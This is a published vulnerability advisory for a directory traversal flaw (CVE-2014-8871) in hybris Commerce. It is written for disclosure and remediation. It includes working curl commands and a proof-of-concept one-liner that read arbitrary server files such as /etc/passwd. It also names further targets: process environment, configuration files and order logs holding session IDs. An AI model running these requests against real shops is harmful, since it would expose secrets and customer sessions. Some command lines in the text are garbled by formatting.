Advisory: Directory Traversal and Arbitrary File Disclosure in hybris Commerce Software Suite During a penetration test, RedTeam Pentesting discovered a Directory Traversal vulnerability in hybris Commerce software suite. This vulnerability allows attackers to download arbitrary files of any size from the affected system. ### Details - Product: hybris Commerce Software Suite - Affected Versions: - Release 5.3: \<= 5.3.0.1 - Release 5.2: \<= 5.2.0.3 - Release 5.1.1: \<= 5.1.1.2 - Release 5.1: \<= 5.1.0.1 - Release 5.0.4: \<= 5.0.4.4 - Release 5.0.3: \<= 5.0.3.3 - Release 5.0.0: \<= 5.0.0.3 - Fixed Versions: - Release 5.3: 5.3.0.2 - Release 5.2: 5.2.0.4 - Release 5.1.1: 5.1.1.3 - Release 5.1: 5.1.0.2 - Release 5.0.4: 5.0.4.5 - Release 5.0.3: 5.0.3.4 - Release 5.0.0: 5.0.0.4 - Vulnerability Type: Directory Traversal, Arbitrary File Disclosure - Security Risk: high - Vendor URL: `http://www.hybris.com/` - Vendor Status: fixed version released - Advisory URL: `https://www.redteam-pentesting.de/advisories/rt-sa-2014-016` - Advisory Status: published - CVE: CVE-2014-8871 - CVE URL: `https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8871` ### Introduction "hybris delivers a commerce software suite that is best in class, helping a company execute all its direct selling processes and present a single view and a unified experience to all its customers." (from the vendor's homepage) ### More Details Webshops based on hybris may use an image retrieval system where images are identified by a URL parameter named "context" rather than a file name. When this system is used, images can be referenced e.g. like the following: \\[...\] Changing the file name part of the URL from "image.jpg" to e.g. "redteam.jpg" reveals that not the file name part of the URL, but the value of the parameter "context" is used to select the desired file. A closer look at the parameter shows that its value is encoded as Base64. Decoding it reveals a pipe-separated data structure which includes a file size (third value), a file name (fifth value) and a SHA-256 hash (sixth value): \$ echo -n "bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3xlM2IwYzQ0Mjk4ZmMxYzE0OWFmYmY0Yzg5OTZmYjkyNDI3YWU0MWU0NjQ5YjkzNGNhNDk1OTkxYjc4NTJiODU1" \| base64 -d master123457415687361172.jpg\|e3b0c44298fc1c149afbf4c89 96fb92427ae41e4649b934ca495991b7852b855 During the penetration test many parameters were inspected and it turned out that the SHA-256 hash is used to reference a particular version of the file, and can be replaced by a dash ("-") character, which always returns the latest version. The example request can be modified and requested with curl as follows: \$ echo -n "master123457415687361172.jpg base64 bWFzdGVyfHJvb3R8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt \$ curl -I [http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R\\](http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R\) 8MTIzNDV8aW1hZ2UvanBlZ3w3NDE1Njg3MzYxMTcyLmpwZ3wt It was verified that the file name (fifth) value is vulnerable to directory traversal. This enables attackers to retrieve the contents of other files from the server's filesystem by using sequences of "../". The following HTTP request for example delivers the contents of the file "/etc/passwd": \$ echo -n "master12345../../../../../../etc/passwd base64 -w0 bWFzdGVyfHJvb3R8MTIzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFz c3dkfC0= \$ curl [http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R8MT\\](http://www.example.com/medias/redteam?context=bWFzdGVyfHJvb3R8MT\) IzNDV8dGV4dC9wbGFpbnwuLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dkfC0 root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh \[...\] The size included in the third field of the data structure is used to limit the number of bytes returned for a file. As it can be modified by attackers, files of any size with arbitrary content can be downloaded, provided the path to the file on the server is known. This enables attackers to read, among others, the environment of the current process at /proc/self/environ and the list of memory maps including the full paths to loaded libraries at /proc/self/maps. This way, knowledge about a particular instance of hybris can be gathered. Afterwards it is possible to access configuration files like "local.properties" and the log files for shop orders which also contain the current session-IDs of users. Furthermore, the Java bytecode of hybris can be downloaded and decompiled. ### Proof of Concept ``` FILENAME=/etc/passwd curl https://www.example.com/medias/redteam?context=$(base64 -w0 <<< \ "master|root|200000000|text/plain|../../../../../..${FILENAME}|-") ``` ### Workaround Implement a new filter which validates file names and insert this filter before hybris' own MediaFilter. The new filter should return an error when a file outside the media directory is requested. ### Fix Upgrade to a fixed hybris version or apply the vendor's hot fix. ### Security Risk This vulnerability can be used to download files from the file system of the server. This includes, among others, configuration files and the hybris order logfile, which contains sensitive data. Therefore, the vulnerability poses a high risk. ### Timeline - 2014-10-08 Vulnerability identified - 2014-10-08 Customer notified vendor - 2014-10-29 Vendor released fixed version - 2014-11-11 CVE number requested - 2014-11-12 Vendor requests more time to notify their customers - 2014-11-14 CVE number assigned - 2014-12-08 Vendor again requests more time to notify customers - 2015-01-12 Vendor notifies customers again, agrees to release advisory on 2015-02-18 - 2015-02-17 Vendor requests more time to notify customers for the 3rd time, RedTeam Pentesting declines - 2015-02-18 Advisory released ### RedTeam Pentesting GmbH RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at `https://www.redteam-pentesting.de`.